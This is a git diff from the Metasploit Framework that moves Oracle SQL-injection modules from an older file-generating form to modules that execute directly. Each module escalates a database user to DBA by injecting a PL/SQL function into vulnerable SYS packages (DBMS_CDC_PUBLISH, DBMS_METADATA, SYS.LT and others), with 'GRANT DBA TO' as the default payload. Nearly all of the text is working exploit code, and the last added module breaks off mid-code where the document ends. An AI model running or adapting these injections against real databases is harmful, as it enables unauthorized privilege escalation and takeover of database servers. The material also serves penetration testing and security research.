diff --git a/modules/auxiliary/admin/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/admin/oracle/dbms_cdc_ipublish.rb deleted file mode 100644 index 2748e80a9f..0000000000 --- a/modules/auxiliary/admin/oracle/dbms_cdc_ipublish.rb +++ /dev/null @@ -1,80 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_CHANGE_SOURCE.', - 'Description' => %q{ - This module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE - procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute - privilege on the vulnerable package can exploit this vulnerability. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-3996' ], - [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ], - ], - 'DisclosureDate' => 'Oct 22 2008')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - ], self.class) - end - - def run - - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - function = %Q| - CREATE OR REPLACE FUNCTION #{name} - RETURN VARCHAR2 AUTHID CURRENT_USER - IS - PRAGMA AUTONOMOUS_TRANSACTION; - BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN NULL; - END; - | - - package = "BEGIN SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE('''||'||user||'.#{name}||''');END;" - - uno = Rex::Text.encode_base64(function) - dos = Rex::Text.encode_base64(package) - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}'))); - EXECUTE IMMEDIATE #{rand1}; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); - EXECUTE IMMEDIATE #{rand2}; - END; - / - DROP FUNCTION #{name}; - | - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - end - -end diff --git a/modules/auxiliary/admin/oracle/dbms_cdc_publish.rb b/modules/auxiliary/admin/oracle/dbms_cdc_publish.rb deleted file mode 100644 index 196af14ce2..0000000000 --- a/modules/auxiliary/admin/oracle/dbms_cdc_publish.rb +++ /dev/null @@ -1,80 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE.', - 'Description' => %q{ - This module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE - procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute - privilege on the vulnerable package can exploit this vulnerability. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-3995' ], - [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ], - ], - 'DisclosureDate' => 'Oct 22 2008')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - ], self.class) - end - - def run - - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - function = %Q| - CREATE OR REPLACE FUNCTION #{name} - RETURN VARCHAR2 AUTHID CURRENT_USER - IS - PRAGMA AUTONOMOUS_TRANSACTION; - BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN NULL; - END; - | - - package = "BEGIN SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE('''||'||user||'.#{name}||''');END;" - - uno = Rex::Text.encode_base64(function) - dos = Rex::Text.encode_base64(package) - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}'))); - EXECUTE IMMEDIATE #{rand1}; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); - EXECUTE IMMEDIATE #{rand2}; - END; - / - DROP FUNCTION #{name}; - | - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - end - -end diff --git a/modules/auxiliary/admin/oracle/lt_mergeworkspace.rb b/modules/auxiliary/admin/oracle/lt_mergeworkspace.rb deleted file mode 100644 index dc9d851ef8..0000000000 --- a/modules/auxiliary/admin/oracle/lt_mergeworkspace.rb +++ /dev/null @@ -1,101 +0,0 @@ -## -# $Id: lt_MERGEWORKSPACE.rb -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection in SYS.LT.MERGEWORKSPACE Procedure.', - 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in - SYS.LT.MERGEWORKSPACE procedure. - }, - 'Author' => [ 'Sh2kerr ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-3983' ], - [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ], - ], - 'DisclosureDate' => 'Jan 13 2009')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('USER', [ false, 'The current user. ', 'SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - - ], self.class) - end - - def run - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - function = %Q| - - CREATE OR REPLACE FUNCTION #{name} return varchar2 - authid current_user AS - pragma autonomous_transaction; - BEGIN - EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN 'X'; - END; - | - - - - prepare ="BEGIN SYS.LT.CREATEWORKSPACE('X'' and #{datastore['USER']}.#{name}()=''X');END;" - - exploiting ="BEGIN SYS.LT.MERGEWORKSPACE('X'' and #{datastore['USER']}.#{name}()=''X');END;" - - - fun = Rex::Text.encode_base64(function) - prp = Rex::Text.encode_base64(prepare) - exp = Rex::Text.encode_base64(exploiting) - - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - #{rand3} VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun}'))); - EXECUTE IMMEDIATE #{rand1}; - EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name} TO PUBLIC'; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}'))); - EXECUTE IMMEDIATE #{rand2}; - #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp}'))); - EXECUTE IMMEDIATE #{rand3}; - END; - / - DROP FUNCTION #{name}; - | - - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - - - end - -end \ No newline at end of file diff --git a/modules/auxiliary/admin/oracle/lt_removeworkspace.rb b/modules/auxiliary/admin/oracle/lt_removeworkspace.rb deleted file mode 100644 index 0951fbb50b..0000000000 --- a/modules/auxiliary/admin/oracle/lt_removeworkspace.rb +++ /dev/null @@ -1,101 +0,0 @@ -## -# $Id: lt_REMOVEWORKSPACE.rb -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection in SYS.LT.REMOVEWORKSPACE Procedure.', - 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in - SYS.LT.REMOVEWORKSPACE procedure. - }, - 'Author' => [ 'Sh2kerr ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-3984' ], - [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ], - ], - 'DisclosureDate' => 'Jan 13 2009')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('USER', [ false, 'The current user. ', 'SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - - ], self.class) - end - - def run - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - function = %Q| - - CREATE OR REPLACE FUNCTION #{name} return varchar2 - authid current_user AS - pragma autonomous_transaction; - BEGIN - EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN 'X'; - END; - | - - - - prepare ="BEGIN SYS.LT.CREATEWORKSPACE('X'' and #{datastore['USER']}.#{name}()=''X');END;" - - exploiting ="BEGIN SYS.LT.REMOVEWORKSPACE('X'' and #{datastore['USER']}.#{name}()=''X');END;" - - - fun = Rex::Text.encode_base64(function) - prp = Rex::Text.encode_base64(prepare) - exp = Rex::Text.encode_base64(exploiting) - - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - #{rand3} VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun}'))); - EXECUTE IMMEDIATE #{rand1}; - EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name} TO PUBLIC'; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}'))); - EXECUTE IMMEDIATE #{rand2}; - #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp}'))); - EXECUTE IMMEDIATE #{rand3}; - END; - / - DROP FUNCTION #{name}; - | - - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - - - end - -end \ No newline at end of file diff --git a/modules/auxiliary/admin/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/admin/oracle/lt_rollbackworkspace.rb deleted file mode 100644 index f6a488bd8b..0000000000 --- a/modules/auxiliary/admin/oracle/lt_rollbackworkspace.rb +++ /dev/null @@ -1,88 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection in SYS.LT.ROLLBACKWORKSPACE Procedure.', - 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in - SYS.LT.ROLLBACKWORKSPACE procedure. Tested on Oracle 10g R1. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2009-0978' ], - [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2009-03.shtml' ], - ], - 'DisclosureDate' => 'May 4 2009')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('USER', [ false, 'The current user. ', 'SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - - ], self.class) - end - - def run - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - ws = Rex::Text.rand_text_alpha_upper(rand(5) + 1) - - function = %Q| - CREATE OR REPLACE FUNCTION #{name} return varchar2 - authid current_user AS - pragma autonomous_transaction; - BEGIN - EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN '#{ws}'; - END; - | - - prepare = "BEGIN SYS.LT.CREATEWORKSPACE('#{ws}'' and #{datastore['USER']}.#{name}()=''#{ws}');END;" - - exploiting = "BEGIN SYS.LT.ROLLBACKWORKSPACE('#{ws}'' and #{datastore['USER']}.#{name}()=''#{ws}');END;" - - fun = Rex::Text.encode_base64(function) - prp = Rex::Text.encode_base64(prepare) - exp = Rex::Text.encode_base64(exploiting) - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - #{rand3} VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun}'))); - EXECUTE IMMEDIATE #{rand1}; - EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name} TO PUBLIC'; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}'))); - EXECUTE IMMEDIATE #{rand2}; - #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp}'))); - EXECUTE IMMEDIATE #{rand3}; - END; - / - DROP FUNCTION #{name}; - | - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - end -end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb new file mode 100644 index 0000000000..9db7f0e76e --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -0,0 +1,75 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE', + 'Description' => %q{ + The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE + procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege + on the vulnerable package can exploit this vulnerability. By default, users granted + EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database + Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2008-3996' ], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-08.shtml'], + ], + 'DisclosureDate' => 'Oct 22 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + ], self.class) + end + + + def run + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + + function = " + CREATE OR REPLACE FUNCTION #{name} + RETURN VARCHAR2 AUTHID CURRENT_USER + IS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN NULL; + END;" + + package = " + BEGIN + SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE('''||'||user||'.#{name}||''');END;" + + clean = "DROP FUNCTION #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + + print_status("Attempting sql injection on SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE...") + prepare_exec(package) + + print_status("Done! Removing function '#{name}'...") + prepare_exec(clean) + end + +end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb new file mode 100644 index 0000000000..34a82231c1 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -0,0 +1,79 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE', + 'Description' => %q{ + The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE + procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege + on the vulnerable package can exploit this vulnerability. By default, users granted + EXECUTE_CATALOG_ROLE have the required privilege. + Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. + Fixed with October 2008 CPU. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2008-3995' ], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-09.shtml' ], + ], + 'DisclosureDate' => 'Oct 22 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + c = connect + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + + function = " + CREATE OR REPLACE FUNCTION #{name} + RETURN VARCHAR2 AUTHID CURRENT_USER + IS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN NULL; + END;" + + package = " + BEGIN + SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE('''||'||user||'.#{name}||'''); + END; + " + + clean = "DROP FUNCTION #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE...") + prepare_exec(package) + + print_status("Done! Removing function '#{name}'...") + prepare_exec(clean) + + c.disconnect + end + +end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb new file mode 100644 index 0000000000..7eae7c89c2 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -0,0 +1,67 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML.', + 'Description' => %q{ + This module will escalate a Oracle DB user to DBA by exploiting an sql injection + bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.metasploit.com' ], + ], + 'DisclosureDate' => 'Jan 5 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha(rand(10) + 1) + + function = " + create or replace function #{datastore['DBUSER']}.#{name} return varchar2 + authid current_user is pragma autonomous_transaction; + begin + execute immediate '#{datastore['SQL']}'; + return ''; + end; + " + + package = "select sys.dbms_metadata.get_granted_xml('''||#{datastore['DBUSER']}.#{name}()||''') from dual" + + clean = "drop function #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + + print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...") + prepare_exec(package) + + print_status("Removing function '#{name}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb new file mode 100644 index 0000000000..89e03d6f26 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -0,0 +1,67 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_METADATA.GET_XML.', + 'Description' => %q{ + This module will escalate a Oracle DB user to DBA by exploiting an sql injection + bug in the SYS.DBMS_METADATA.GET_XML package/function. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.metasploit.com' ], + ], + 'DisclosureDate' => 'Jan 5 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha(rand(10) + 1) + + function = " + create or replace function #{datastore['DBUSER']}.#{name} return varchar2 + authid current_user is pragma autonomous_transaction; + begin + execute immediate '#{datastore['SQL']}'; + return ''; + end; + " + + package = "select sys.dbms_metadata.get_xml('''||#{datastore['DBUSER']}.#{name}()||''','') from dual" + + clean = "drop function #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + + print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_XML...") + prepare_exec(package) + + print_status("Removing function '#{name}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb new file mode 100644 index 0000000000..a4797633af --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -0,0 +1,67 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_METADATA.OPEN.', + 'Description' => %q{ + This module will escalate a Oracle DB user to DBA by exploiting an sql injection + bug in the SYS.DBMS_METADATA.OPEN package/function. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.metasploit.com' ], + ], + 'DisclosureDate' => 'Jan 5 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha(rand(10) + 1) + + function = " + create or replace function #{datastore['DBUSER']}.#{name} return varchar2 + authid current_user is pragma autonomous_transaction; + begin + execute immediate '#{datastore['SQL']}'; + return ''; + end; + " + + package = "select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{name}()||''') from dual" + + clean = "drop function #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + + print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...") + prepare_exec(package) + + print_status("Removing function '#{name}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb new file mode 100644 index 0000000000..64c8cecb81 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -0,0 +1,73 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.LT.COMPRESSWORKSPACE.', + 'Description' => %q{ + This module exploits an sql injection flaw in the COMPRESSWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'CG' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ], + ], + 'DisclosureDate' => 'Nov 11, 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + cruft = Rex::Text.rand_text_alpha_upper(1) + + function = " + CREATE OR REPLACE FUNCTION #{cruft} + RETURN VARCHAR2 AUTHID CURRENT_USER + AS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN '#{cruft}'; + END;" + + package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;" + + package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;" + + clean = "DROP FUNCTION #{cruft}" + + print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...") + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + prepare_exec(package1) + prepare_exec(package2) + print_status("Removing function '#{cruft}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb new file mode 100644 index 0000000000..0d4e3400c9 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -0,0 +1,62 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method', + 'Description' => %q{ + This module will escalate a Oracle DB user to DBA by exploiting + an sql injection bug in the SYS.LT.FINDRICSET package via Evil + Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on + thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical + Patch update October 2007. + }, + 'Author' => ['CG'], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'BID', '26098' ], + [ 'CVE', '2007-5511'], + [ 'URL', 'http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.sql'], + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'], + ], + 'DisclosureDate' => 'Oct 17 2007')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + p = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + + cursor = " + DECLARE + #{p} NUMBER; + BEGIN + #{p} := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0); + SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--',''); + END;" + + begin + print_status("Sending Evil Cursor and SQLI...") + 